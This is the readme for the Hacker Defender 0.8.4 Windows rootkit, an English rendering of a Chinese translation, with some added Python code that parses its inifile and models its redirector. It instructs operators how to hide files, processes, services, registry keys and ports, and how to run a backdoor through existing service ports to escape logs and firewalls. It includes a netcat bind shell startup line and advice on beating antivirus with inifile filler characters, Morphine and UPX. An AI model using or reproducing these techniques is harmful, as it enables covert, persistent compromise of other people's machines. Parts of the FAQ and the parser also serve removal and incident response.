
=============[ Hacker defender v0.8.4 - readme (Chinese edition) ]=============
Chinese translation by ttian.net ------------------ www.ttian.net
Authors: Holy_Father <holy_father@phreaker.net>, Ratter/29A <ratter@atlas.cz>
Translator: luoluo <luoluo@ttian.net> (translator's note: for lack of time this is a first draft and has not been proofread; apologies for any mistakes)
Version: 0.8.4
Release date: 20.10.2003
Homepage: http://rootkit.host.sk
Testers: ch0pper <THEMASKDEMON@flashmail.com>, aT4r <at4r@hotmail.com>, phj34r <phj34r@vmatrics.net>, unixdied <0edfd3cfd9f513ec030d3c7cbdf54819@hush.ai>, rebrinak, GuYoMe, ierdna <ierdna@go.ro>, Afakasf <undefeatable@pobox.sk>
=====[ 1. Contents ]============================================================
1. Contents
2. Introduction
   2.1 Idea
   2.2 Licence
3. Usage
4. Inifile
5. Backdoor
   5.1 Redirector
6. Technical notes
   6.1 Versions
   6.2 Hooked API calls
   6.3 Known bugs
7. FAQ
8. Files
=====[ 2. Introduction ]========================================================
Hacker Defender (hxdef) is a system tool for Windows NT 4.0, Windows 2000 and Windows XP. The main program is written in Delphi 6, the newer features in assembler and the driver in C. The backdoor and redirector clients are mostly Delphi 6.
The program uses a modified version of LDE32:
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE special edition for REVERT tool version 1.05
The program also uses the Superfast/Supertiny Compression/Encryption library:
Superfast/Supertiny Compression/Encryption library. (c) 1998 by Jacky Qwerty/29A.
=====[ 2.1 Idea ]===============================================================
The main idea is to rewrite a small number of bytes in the memory of every running process. Patching these basic modules changes what the process does; at the same time the patch must keep the system and the process stable.
The program must be completely hidden from other processes. At present the user can hide files, processes, system services, system drivers, registry keys and values and open ports, and can fake the free disk space. The program also masks the changes it made in memory and invisibly controls the hidden processes. It installs a hidden backdoor, registers a hidden system service and installs a system driver. The backdoor technique allows a redirector to be deployed through it.
=====[ 2.2 Licence ]============================================================
Until version 1.0.0 hxdef is freeware. It may be distributed freely but not modified, and every copy must contain all of the original files (including the original documentation). The only exception is a target (and the owner of the target machine) who is not meant to know about the copy.
The project will be open source from version 1.0.0.
The authors further accept no responsibility for any consequences of using this software.
=====[ 3. Usage ]===============================================================
Using hxdef is very simple:
>hxdef084.exe [inifile]
or
>hxdef084.exe [switch]
The default inifile name is EXENAME.ini, where EXENAME is the name of the main executable without its extension. The default inifile (e.g. hxdef084.ini) is used when no [inifile] is given and when a [switch] is used.
The available switches are:
-:installonly - only install the service, do not run
-:refresh     - re-read the inifile and update the settings
-:noservice   - run normally without installing the service
-:uninstall   - unload hxdef from memory and disconnect all backdoor connections (stopping the hxdef service currently does the same)
Example:
>hxdef084.exe -:refresh
This makes hxdef re-read the default inifile and apply its settings. It is strongly recommended that you create your own inifile; the settings it can contain are described in section 4.
The switches -:refresh and -:uninstall work only when invoked from the original exe file. In other words, you must know the file name and path hxdef was started from in order to refresh its settings or uninstall it.
=====[ 4. Inifile ]=============================================================
The inifile must contain these nine sections: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports] and [Settings].
In [Hidden Table], [Root Processes], [Hidden Services] and [Hidden RegValues] the wildcard "*" may be used at the end of a string (and only at the end): everything after the first asterisk is ignored. Whitespace before the first character and after the last character of a line is ignored.
Example:
[Hidden Table]
hxdef*
This hides every file, directory and process whose name starts with "hxdef".
[Hidden Table] is the list of files, directories and processes to hide. Every file and directory on the list disappears from file managers, and every listed program disappears from the task list. Make sure the main program, the inifile, the backdoor and the driver file are on this list. [Root Processes] is a list of programs that are exempt from hiding: only through them can you see the hidden files, directories and programs. Nothing is hidden from a root process.
[Hidden Services] is the list of hidden services and drivers. The default service name in the service database is HackerDefender084 and the default driver name is HackerDefenderDrv084. Both names can be changed in the inifile's [Settings].
[Hidden RegKeys] is the list of registry keys to hide. There are four default entries: HackerDefender084, HackerDefenderDrv084, LEGACY_HACKERDEFENDER084 and LEGACY_HACKERDEFENDERDRV084. If you change the service or driver name you must change these entries too. The first two correspond to the service and driver names; the other two are LEGACY_NAME in upper case. For example, if you rename the service to BoomThisIsMySvc, the entry here is LEGACY_BOOMTHISISMYSVC.
[Hidden RegValues] is the list of registry values to hide.
[Startup Run] is the list of programs to run when the rootkit starts. They run with the same privileges as the system. The program name is separated from its arguments by the "?" character. Do not use the " character, because the program would then be terminated when a user logs on. Use common, well-known names where possible. The following shortcuts are available:
%cmd%    - the system shell with its path (e.g. C:\winnt\system32\cmd.exe)
%cmddir% - the directory of the system shell (e.g. C:\winnt\system32\)
%sysdir% - the system directory (e.g. C:\winnt\system32\)
%windir% - the Windows installation directory (e.g. C:\winnt\)
%tmpdir% - the system temp directory (e.g. C:\winnt\temp\)
Examples:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
A netcat shell starts with the system and listens on port 100.
2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
At every system start a timestamp is appended to starttime.txt in the temp directory (e.g. C:\winnt\temp\starttime.txt). (%TIME% is only available on Windows 2000 and later.)
[Free Space] is the list of drive letters and faked free space. The format is X:NUM, where X: is the drive letter and NUM is the number of bytes to add to the reported free space.
Example:
[Free Space]
C:123456789
This adds roughly 123 MB of fake free space to drive C.
[Hidden Ports] is the list of ports to hide from port viewers such as OpPorts, FPort, Active Ports and TCPView. The section has at most two lines: the first is TCP:port1,port2,port3... and the second is UDP:port1,port2,port3...
Examples:
1)
[Hidden Ports]
TCP:8080,456
This hides 8080/TCP and 456/TCP.
2)
[Hidden Ports]
TCP:8001
UDP:12345
This hides 8001/TCP and 12345/UDP.
3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800
This hides 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP. (Note that the TCP: line must still be present.)
[Settings] holds eight values: Password=, BackdoorShell=, FileMappingName=, ServiceName=, ServiceDisplayName=, ServiceDescription=, DriverName= and DriverFileName=.
Password is a password of up to 16 characters used by the backdoor and the redirector; a shorter password is padded with spaces. BackdoorShell is the name of the copy of the system shell (usually cmd.exe) that the backdoor creates in the system temp directory.
FileMappingName is the name of the shared memory section used to share these settings between all processes on the system.
ServiceName is the name of the system service.
ServiceDisplayName is the display name of the system service.
ServiceDescription is the text shown as the service's description.
DriverName is the name of the hxdef driver.
DriverFileName is the file name of the hxdef driver.
Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender084
ServiceDisplayName=HXD Service 084
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv084
DriverFileName=hxdefdrv.sys
This means the password is "hxdef-rulez"; the backdoor copies the system shell (usually cmd.exe) to "hxdef?.exe" in the temp directory; the shared memory name is "_.-=[Hacker Defender]=-._"; the service is called "HackerDefender084", displayed as "HXD Service 084" with the description "powerful NT rootkit"; the driver is called "HackerDefenderDrv084" and is stored in the file "hxdefdrv.sys".
The characters |, <, >, :, \, / and " are ignored everywhere except inside [Startup Run], [Free Space] and [Hidden Ports] and after the first "=" in [Settings]. Inserting such characters lets your inifile slip past antivirus scanners.
Example:
[H<<<idden T>>a/"ble]
>h"xdef"*
is equivalent to:
[Hidden Table]
hxdef*
For more examples see hxdef084.ini and hxdef084.2.ini.
Everything in the inifile except [Settings] and [Startup Run] is case-insensitive.
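The rules above can be exercised with a small parser. The following is an added example written for this page, not code from hxdef or its authors: it implements section 4 as stated (the filler characters, the trailing-asterisk wildcard, the [Hidden Ports] layout, the %..% shortcuts in [Startup Run] and key=value in [Settings]). The shortcut paths, the case-insensitive name comparison and the treatment of the section as a whole are assumptions marked in the code, and the sample inifile is constructed from the readme's own examples rather than taken from the shipped hxdef084*.ini files. It is also the tool an incident responder wants when handed an inifile padded with filler characters, since questions 1 and 2 of the FAQ depend on reading ServiceName and Hidden Table out of it.

```python
"""Added example (not hxdef's code): normalize and parse a Hacker Defender 0.8.4
style inifile by the rules in section 4 of the readme: filler characters the
rootkit ignores, the trailing '*' wildcard, and the [Hidden Ports],
[Startup Run] and [Settings] layouts.  Assumptions are marked in comments."""

FILLER = set('|<>:\\/"')            # readme: ignored outside the exempt sections
VERBATIM_SECTIONS = {"startup run", "free space", "hidden ports"}
# Shortcut values are the readme's examples for a C:\winnt install (assumption).
SHORTCUTS = {
    "%cmd%": "C:\\winnt\\system32\\cmd.exe", "%cmddir%": "C:\\winnt\\system32\\",
    "%sysdir%": "C:\\winnt\\system32\\", "%windir%": "C:\\winnt\\",
    "%tmpdir%": "C:\\winnt\\temp\\",
}


def strip_filler(text: str) -> str:
    """Drop the anti-antivirus filler characters."""
    return "".join(ch for ch in text if ch not in FILLER)


def parse_ini(text: str) -> dict:
    """Return {section name (lower-case): [normalized lines]}."""
    sections, current = {}, None
    for raw in text.splitlines():
        probe = strip_filler(raw).strip()        # headers are always de-fillered
        if probe.startswith("[") and probe.endswith("]"):
            current = probe[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or not raw.strip():
            continue
        if current in VERBATIM_SECTIONS:         # filler is significant here
            line = raw.strip()
        elif current == "settings":              # de-filler the key, keep the value
            key, sep, value = raw.partition("=")
            line = strip_filler(key).strip() + sep + value.strip()
        else:
            line = probe
        if line:
            sections[current].append(line)
    return sections


def name_matches(pattern: str, name: str) -> bool:
    """Text after the first '*' is ignored, so 'hxdef*' is a prefix match.  Names are
    compared case-insensitively (assumption: only [Settings]/[Startup Run] are not)."""
    star = pattern.find("*")
    if star >= 0:
        return name.casefold().startswith(pattern[:star].casefold())
    return name.casefold() == pattern.casefold()


def parse_hidden_ports(lines: list) -> dict:
    """'TCP:p1,p2' and 'UDP:p1,p2' lines; an empty 'TCP:' line is allowed."""
    ports = {"TCP": set(), "UDP": set()}
    for line in lines:
        proto, sep, rest = line.partition(":")
        if sep and proto.strip().upper() in ports:
            ports[proto.strip().upper()] |= {int(p) for p in rest.split(",") if p.strip()}
    return ports


def parse_startup_run(lines: list, shortcuts: dict = SHORTCUTS) -> list:
    """'PROGRAM?ARGUMENTS' with %cmd%-style shortcuts expanded in both parts."""
    entries = []
    for line in lines:
        prog, _, args = line.partition("?")
        for key, val in shortcuts.items():
            prog, args = prog.replace(key, val), args.replace(key, val)
        entries.append((prog, args))
    return entries


def parse_settings(lines: list) -> dict:
    """key=value, the value being everything after the first '='.  The readme says a
    password shorter than 16 characters is space-padded, so pad it here."""
    settings = {}
    for line in lines:
        key, sep, value = line.partition("=")
        if sep:
            settings[key] = value
    if "Password" in settings:
        settings["Password"] = settings["Password"].ljust(16)
    return settings


# Constructed sample assembled from the readme's own examples, with filler added
# the way its anti-antivirus example does; not one of the shipped hxdef084*.ini.
SAMPLE_INI = r'''
[H<<<idden T>>a/"ble]
>h"xdef"*
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
[Hidden Ports]
TCP:8080,456
UDP:53,54
[Settings]
Pass"word=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
'''
```

Calling parse_ini(SAMPLE_INI) yields the plain sections the example in the text describes ([Hidden Table] containing hxdef*, a Password key with the filler removed, the FileMappingName value kept intact even though it contains "=" and "["), and name_matches implements the prefix semantics that make hxdef* cover hxdef084.exe and hxdef084.ini but not a name that merely contains "hxdef".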
=====[ 5. Backdoor ]============================================================
The rootkit hooks a few API functions that receive data from the network. When a received packet consists of the 256-bit key and the password and service checks pass, a copy of the system shell is saved into the temp directory; for that connection it takes the place of the original service, and every following packet is forwarded to the new shell.
Because the rootkit hooks every process, the TCP port of every service becomes a backdoor port. For example, if the target host has HTTP open on port 80, that port is also a backdoor port, unless it was opened by a process the rootkit does not hook. The backdoor only works with services whose receive buffer is at least 256 bits, which almost every standard service (Apache, IIS, Oracle and so on) satisfies. The backdoor is hidden because its traffic arrives through a normal service port: a port scan shows nothing new, and the connection passes through firewalls easily, unless there is a protocol-aware proxy in between, for example one that only relays real FTP or HTTP.
In tests with IIS the HTTP server logged nothing about such connections, and the FTP and SMTP servers logged only the connection's termination. So if you run hxdef on an IIS server, the HTTP port is the best backdoor port.
bdcli084.exe is used to connect to the backdoor.
Usage: bdcli084.exe host_or_IP port password
Example:
>bdcli084.exe www.windowsserver.com 80 hxdef-rulez
The version 0.8.4 client is not compatible with earlier versions.
=====[ 5.1 Redirector ]=========================================================
The redirector is based on the backdoor technique: the first packet is identical to the backdoor's, so you can use the same port as for the backdoor. The second packet is specific to the redirector; it is generated by the redirector base (the client program) and identifies the target server and port.
The redirector base stores its configuration in an inifile named after the exe (so the default is rdrbs084.ini). If the file does not exist at startup it is created automatically. All settings can be adjusted from the console.
To use the redirector through a server on which hxdef is installed, first run the redirector base on your own machine and use its console to control the hxdef on the remote server; the local connection to the remote machine is authenticated with the password. In this version the connection speed is limited to about 256 kBps: the redirector is not designed for fast links, it is throttled on the installed system, and it works only with TCP.
This version has 19 commands, described by HELP. When the base starts, the commands in the startup list are executed first; the startup list is edited with the commands whose names begin with SU.
The redirector distinguishes two connection types, HTTP and other. For the other type packets are passed through unmodified; for HTTP the request header is rewritten for the target server. At most 1000 ports can be mapped.
The redirector is fully functional only on NT systems: only there can the tray icon be hidden, can it run in silent mode without any dialogs or icons, and can the startup list be used.
Examples:
1) Show mapped-port information:
>MPINFO
No mapped ports in the list.
2) Add the MPINFO command to the startup list and show the startup list:
>SUADD MPINFO
>sulist
0) MPINFO
3) Use the HELP command:
>HELP
Type HELP COMMAND for command details.
Valid commands are: HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL, DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]
4) Add a mapping: local listening port 100, hxdef installed on 200.100.2.36 port 80, target server www.google.com port 80, password bIgpWd, HTTP type. The target server must be given as an IP address, here 216.239.53.100:
>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com
ADD can also be run without parameters; in this example we supplied all of them.
5) Check the mapped-port information again:
>MPINFO
There are 1 mapped ports in the list. Currently 0 of them open.
6) List the mapped ports:
>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7) Show the details of a mapped port:
>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED
8) Test whether hxdef is really running on the mapping server 200.100.2.36 (optional):
>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd - OK
If the test fails the response is:
Testing 0) 200.100.2.36:80:bIgpWd - FAILED
9) A port is closed until it is used; open it with OPEN and close it with CLOSE. The ALL argument applies the command to every port in the list.
>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.
or
>OPEN ALL
Port number 0 opened.
10) SAVE stores the current settings and the port list in the inifile (EXIT without the DIS argument also saves):
>SAVE
Saved successfully.
You can now open http://localhost:100/ in your browser; if everything is right you will see the Google home page fetched through the mapping.
The first packet is allowed a delay of 5 seconds; for all other packets the limit is only the connection speed of both sides. The redirector manages roughly 256 kBps.
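As an added example (not the redirector's own code), the following models the client-side pieces the readme documents: the ADD argument layout from HELP ADD, the LIST record and MPINFO output shown above, and the HTTP/other distinction, realised here as replacing the request's Host header with the mapping's domain. The wire handshake with the backdoor (the 256-bit key, password and target selection) is not described on this page and is left out. The name OTHER for non-HTTP mappings and the pass-through of chunks without a complete header block are assumptions.

```python
"""Added example (not the redirector's own code): a model of the redirector base's
mapped-port records and of the one transformation the readme attributes to
HTTP-type mappings, rewriting the Host header to the configured domain while
non-HTTP mappings relay bytes unchanged.  The backdoor handshake that precedes
the relay is not described on this page and is not modelled."""
import re
from dataclasses import dataclass

FIRST_PACKET_TIMEOUT_S = 5      # readme: the first packet is allowed 5 seconds
MAX_MAPPED_PORTS = 1000         # readme: at most 1000 mapped ports


@dataclass
class MappedPort:
    local_port: int
    mapping_server: str         # host running hxdef
    mapping_port: int           # a backdoor-capable port on that host
    target_server: str          # readme: must be an IP address
    target_port: int
    password: str
    port_type: str = "OTHER"    # readme distinguishes HTTP from everything else;
    domain: str = ""            # the name "OTHER" for the rest is an assumption

    @classmethod
    def from_add(cls, argline: str) -> "MappedPort":
        """Parse the argument string of ADD exactly as HELP ADD lists it."""
        p = argline.split()
        if len(p) < 6:
            raise ValueError("ADD needs LOCAL PORT, MAPPING SERVER, MAPPING SERVER "
                             "PORT, TARGET SERVER, TARGET SERVER PORT and PASSWORD")
        port_type = p[6].upper() if len(p) > 6 else "OTHER"
        domain = p[7] if len(p) > 7 else ""
        if port_type == "HTTP" and not domain:
            raise ValueError("HTTP type requires a domain")   # HELP ADD says so
        return cls(int(p[0]), p[1], int(p[2]), p[3], int(p[4]), p[5], port_type, domain)

    def list_line(self, index: int) -> str:
        """Reproduce the LIST record layout the readme shows (no domain in it)."""
        return (f"{index:03d}) :{self.local_port}:{self.mapping_server}:"
                f"{self.mapping_port}:{self.target_server}:{self.target_port}:"
                f"{self.password}:{self.port_type}")


_HOST_LINE = re.compile(rb"^host:[ \t]*[^\r\n]*\r\n", re.IGNORECASE | re.MULTILINE)


def rewrite_outbound(data: bytes, mp: MappedPort) -> bytes:
    """Readme rule: non-HTTP mappings pass bytes through unchanged; HTTP mappings
    have the request header rewritten for the target, here by replacing (or, for a
    request without one, inserting) the Host header.  Only the header block up to
    the first blank line is touched; a chunk without a complete header block is
    passed through (assumption)."""
    if mp.port_type != "HTTP":
        return data
    end = data.find(b"\r\n\r\n")
    if end < 0:
        return data
    head, body = data[:end + 2], data[end + 2:]
    host_line = b"Host: " + mp.domain.encode("ascii") + b"\r\n"
    if _HOST_LINE.search(head):
        head = _HOST_LINE.sub(host_line, head, count=1)
    else:
        cut = head.find(b"\r\n") + 2          # right after the request line
        head = head[:cut] + host_line + head[cut:]
    return head + body


class MappedPortTable:
    """The LIST/MPINFO bookkeeping: numbered records, open/closed state, the cap."""

    def __init__(self) -> None:
        self.ports: list = []
        self.open: set = set()

    def add(self, mp: MappedPort) -> int:
        if len(self.ports) >= MAX_MAPPED_PORTS:
            raise OverflowError("mapped-port list is full")
        self.ports.append(mp)
        return len(self.ports) - 1              # the index OPEN/CLOSE/DETAIL use

    def set_open(self, index: int, state: bool) -> None:
        (self.open.add if state else self.open.discard)(index)

    def mpinfo(self) -> str:
        if not self.ports:
            return "No mapped ports in the list."
        return (f"There are {len(self.ports)} mapped ports in the list. "
                f"Currently {len(self.open)} of them open.")
```

Feeding the ADD line from step 4 into MappedPort.from_add and printing list_line(0) reproduces the LIST record of step 6; a browser request to localhost:100 carries "Host: localhost:100", which the HTTP-type rewrite turns into "Host: www.google.com" before the relay, which is why the domain must be given for HTTP mappings while other mappings need none.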
=====[ 6. Technical notes ]=====================================================
This section is intended for testers and developers only.
=====[ 6.1 Versions ]===========================================================
(+ new feature, - known problem, x fixed bug)

TODO
- unify backdoor, redirector and file manager
- write new better backdoor
- backdoor proxy support
- hiding in remote sessions (netbios, remote registry)
- hidden memory type change (advanced memory hiding)
- hook NtNotifyChangeDirectoryFile

0.8.4
+ hook of NtCreateFile and NtOpenFile to hide file operations
+ hxdef mailslot name is dynamic
+ switch -:uninstall for removing and updating hxdef
+ -:refresh can be run from original .exe file only
+ new readme - several corrections, more information, faq
+ shortcuts for [Startup Run]
+ free space cheating via NtQueryVolumeInformationFile hook
+ open ports hiding via NtDeviceIoControlFile hook
+ much more info in [Comments] in inifile
+ supporting Ctrl+C in backdoor session
+ FileMappingName is an option now
+ Root Processes running on the system level
+ handles hiding via NtQuerySystemInformation hook class 16
+ using system driver
+ antiantivirus inifile
+ more stable on Windows boot and shutdown
+ memory hiding improved
- found bug in backdoor client when pasting data from clipboard
x found and fixed increasing pid bug via NtOpenProcess hook
x found and fixed bug in NtReadVirtualMemory hook
x found and fixed several small bugs
x found and fixed backdoor shell name bug

0.7.3
+ direct hooking method
+ hiding files via NtQueryDirectoryFile hook
+ hiding files in ntvdm via NtVdmControl hook
+ new process hooking via NtResumeThread hook
+ process infection via LdrInitializeThunk hook
+ reg keys hiding via NtEnumerateKey hook
+ reg values hiding via NtEnumerateValueKey hook
+ dll infection via LdrLoadDll hook
+ more settings in inifile
+ safemode support
+ masking memory change in processes via NtReadVirtualMemory hook
x fixed debugger bug
x fixed w2k MSTS bug
x found and fixed zzZ-service bug

0.5.1
+ never more hooking WSOCK
x fixed bug with MSTS

0.5.0
+ low level redir based on backdoor technique
+ password protection
+ name of inifile depends on exefile name
+ backdoor stability improved
- redirector's connection speed is limited to about 256 kBps, imperfect implementation of redirector, imperfect design of redirector
- found chance to detect rootkit with symbolic link objects
- found bug in connection with MS Terminal Services
- found bug in hiding files in 16-bit applications
x found and fixed bug in services enumeration
x found and fixed bug in hooking servers

0.3.7
+ possibility to change settings during running
+ wildcard in names of hidden files, processes and services
+ possibility to add programs to rootkit startup
x fixed bug in hiding services on Windows NT 4.0

0.3.3
+ stability really improved
x fixed all bugs for Windows XP
x found and fixed bug in hiding in registry
x found and fixed bug in backdoor with more clients

0.3.0
+ connectivity, stability and functionality of backdoor improved
+ backdoor shell runs always on system level
+ backdoor shell is hidden
+ registry keys hiding
x found and fixed bug in root processes
- bug in XP after reboot

0.2.6
x fixed bug in backdoor

0.2.5
+ fully interactive console
+ backdoor identification key is now only 256 bits long
+ improved backdoor installation
- bug in backdoor

0.2.1
+ always run as service

0.2.0
+ system service installation
+ hiding in database of installed services
+ hidden backdoor
+ no more working with windows

0.1.1
+ hidden in tasklist
+ usage - possibility to specify name of inifile
x found and then fixed bug in communication
x fixed bug in using advapi
- found bug with debuggers

0.1.0
+ infection of system services
+ smaller, tidier, faster code, more stable program
x fixed bug in communication

0.0.8
+ hiding files
+ infection of new processes
- can't infect system services
- bug in communication
=====[ 6.2 Hooked API calls ]===================================================
List of API functions which are hooked:
Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (classes 5 and 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.LdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtOpenFile
Ntdll.LdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA
=====[ 6.3 Known bugs ]=========================================================
There is one known bug in this version.
1) The backdoor client may crash when you paste a larger amount of data from the clipboard by right-clicking the console or using the console menu. You can still paste from the clipboard with Ctrl+Ins or Shift+Ins if the program running in the console supports this.
If you think you have found a bug, please report it on the public board (or on the betatesters' board if you are a betatester) or to <rootkit@host.sk>. But make sure you have read this readme, the FAQ section, the TODO list and the board, and have found nothing about what you want to report, before you write.
=====[ 7. FAQ ]=================================================================
Because of the many simple questions on the board I decided to create a FAQ section in this readme. Before you ask anything, read this readme twice, paying special attention to this section. Then read the old messages on the board, and only if you still think you cannot find an answer, post your question on the board.
The questions are:
1) I've downloaded hxdef, run it and can't get rid of it. How can I uninstall it if I can't see its process, service and files?
2) Somebody hacked my box, ran hxdef and I can't get rid of it. How can I uninstall it and all the backdoors that were installed on my machine?
3) Is this program detected by antivirus software? And if yes, is there any way to beat it?
4) How come I can't connect to the backdoor on ports 135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP when the target box has them open?
5) Is there any way to have a hidden process whose file on disk is visible?
6) How about hiding svchost.exe and the others I can see in the tasklist?
7) I'm using DameWare and I can see all your services and everything that should be hidden. Is this a bug?
8) But anyone can see my hidden files via netbios. What should I do?
9) The backdoor client is not working. Everything seems ok, but after connecting I can't type anything and the whole console screen is black. What should I do?
10) When will we get the new version?
11) The net.exe command can stop hidden services, is this a bug?
12) Is there any way to detect this rootkit?
13) So, how difficult is it to detect hxdef, and did somebody make a program that can do it?
14) So, how can I detect it?
15) Does a version number starting with 0 mean that it is not a stable version?
16) When will you publish the source? I've read it will be with version 1.0.0, but when?
17) I want to be a betatester, what should I do?
18) Is it legal to use hxdef?
19) Is it possible to update a machine running an old hxdef to this version? Is it possible without rebooting the machine?
20) Is it possible to update a machine running this version of hxdef to a newer version I get in the future? Is it possible without rebooting?
21) Is it better to use -:uninstall or net stop ServiceName?
22) I really love this program. Can I support your work with a little donation?
23) Is there any chance to hide C:\temp and not hide C:\winnt\temp?
24) I can see the password in the inifile is plaintext! How is this possible?
25) If I have a process that is in Hidden Table and it listens on a port, will this port be hidden automatically or should I put it in Hidden Ports?
Now the answers:
1) Q: I've downloaded hxdef, run it and can't get rid of it. How can I uninstall it if I can't see its process, service and files?
A: If you left the default settings you can open a shell and stop the service:
>net stop HackerDefender084
Hxdef is implemented to uninstall itself completely when you stop its service. This does the same as -:uninstall, but you don't need to know where hxdef is.
If you changed ServiceName in the inifile's Settings, type this in your shell:
>net stop ServiceName
where ServiceName stands for the value you set for ServiceName in the inifile.
If you forgot the name of the service you can boot your system from CD, find the hxdef inifile, look up the ServiceName value there and then stop the service as above.
2) Q: Somebody hacked my box, ran hxdef and I can't get rid of it. How can I uninstall it and all the backdoors that were installed on my machine?
A: The only 100% solution is to reinstall your Windows. If you don't want to do that you'll have to find the inifile as in question 1 above. Then, after uninstalling hxdef from your system, go through the inifile and try to find all files that match the entries in Hidden Table. Then verify those files and delete them.
3) Q: Is this program detected by antivirus software? And if yes, is there any way to beat it?
A: Yes, and not only the exefile is detected: a few antivirus systems also detect the inifile, and the driver file may be detected too. The answer to the second question is also yes, you can beat it quite easily. On the hxdef home site you can find a tool called Morphine. If you use Morphine on the hxdef exefile you get a new exefile which common antivirus systems cannot detect. The inifile is also designed to beat antivirus systems: you can add extra characters to it to confuse them. See section 4, Inifile, for more information, and see the included inifiles: there are two samples that are equivalent, but the first one uses extra characters so that common antivirus systems cannot detect it. Probably the best approach is to use UPX before you use Morphine: UPX reduces the size of the hxdef exefile and Morphine adds the antiantivirus shield. See the Morphine readme for more information.
4) Q: How come I can't connect to the backdoor on ports 135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP when the target box has them open?
A: As mentioned in section 5, Backdoor, the backdoor needs a server whose incoming buffer is at least 256 bits. System ports may also not work. If you have trouble finding an open port that works, you can simply run netcat listening on a port of your own. You should then add this netcat port to Hidden Ports in the inifile.
5) Q: Is there any way to have a hidden process whose file on disk is visible?
A: No. And you also can't have a hidden file on disk for a process that is visible in the task list.
6) Q: How about hiding svchost.exe and the others I can see in the tasklist?
A: This is a really bad idea. If you hide common system processes your Windows can crash very soon. With hxdef you don't need to name your malicious files svchost.exe, lsass.exe etc.; you can give them any name and add that name to Hidden Table to hide them.
7) Q: I'm using DameWare and I can see all your services and everything that should be hidden. Is this a bug?
A: Nope. DameWare and other tools that use remote sessions (and/or netbios) can see hidden services because this feature is not implemented yet. There is a big difference between a bug and something not implemented. See the TODO list on the web for things that are not implemented yet.
8) Q: But anyone can see my hidden files via netbios. What should I do?
A: Put your files deep inside the system directories or into directories that are not shared.
9) Q: The backdoor client is not working. Everything seems ok, but after connecting I can't type anything and the whole console screen is black. What should I do?
A: You are probably using a bad port for connecting. Hxdef tries to detect bad ports and disconnect you, but sometimes it cannot detect that you are using a bad port. So try a different port.
10) Q: When will we get the new version?
A: The developers code this stuff in their free time. They take no money for it and don't want any. There are only two coders right now and we think that is enough for this project. This means coding is not as fast as at Microsoft, so you should wait and not ask when the new version will be released. Unlike Microsoft our product is free, we have good betatesters and we test this program a lot, so our public versions are stable.
11) Q: The net.exe command can stop hidden services, is this a bug?
A: Nope. It is not a bug, it is a feature. You still have to know the name of the service you want to stop, and if it is hidden the only one who can know it is the rootkit admin. Don't worry that this is a way to detect you.
12) Q: Is there any way to detect this rootkit?
A: Yes. There are so many ways to detect any rootkit, and this one is not (and can't be) an exception. Every rootkit can be detected. The only questions are how difficult it is and whether somebody has made a program that can do it.
13) Q: So, how difficult is it to detect hxdef, and did somebody make a program that can do it?
A: It is very very easy to detect it, but I don't know of a special tool that can tell you that hxdef is on your machine right now.
14) Q: So, how can I detect it?
A: I won't tell you this :)
15) Q: Does a version number starting with 0 mean that it is not a stable version?
A: No, it means that a few things are not implemented yet and that the source is closed and under development.
16) Q: When will you publish the source? I've read it will be with version 1.0.0, but when?
A: I really don't know when. There are several things I want to implement before releasing 1.0.0. It can take six months as well as a year or longer.
17) Q: I want to be a betatester, what should I do?
A: You should write me a mail about how you can contribute, what your abilities are for this job and what experience you have with betatesting. But the chance of becoming a new betatester for this project is quite low. Right now we have enough testers who do a good job, and there is no need to increase their number.
18) Q: Is it legal to use hxdef?
A: Sure it is, but hxdef can easily be misused for illegal activities.
19) Q: Is it possible to update a machine running an old hxdef to this version? Is it possible without rebooting the machine?
A: It isn't possible without rebooting the machine, but you can update it by manually uninstalling the old version, rebooting the machine and installing the new version.
20) Q: Is it possible to update a machine running this version of hxdef to a newer version I get in the future? Is it possible without rebooting?
A: Yes! You can use -:uninstall to totally remove this version of hxdef without rebooting. Then simply install the new version.
21) Q: Is it better to use -:uninstall or net stop ServiceName?
A: The preferred way is -:uninstall if you have the chance, but net stop will also do the job.
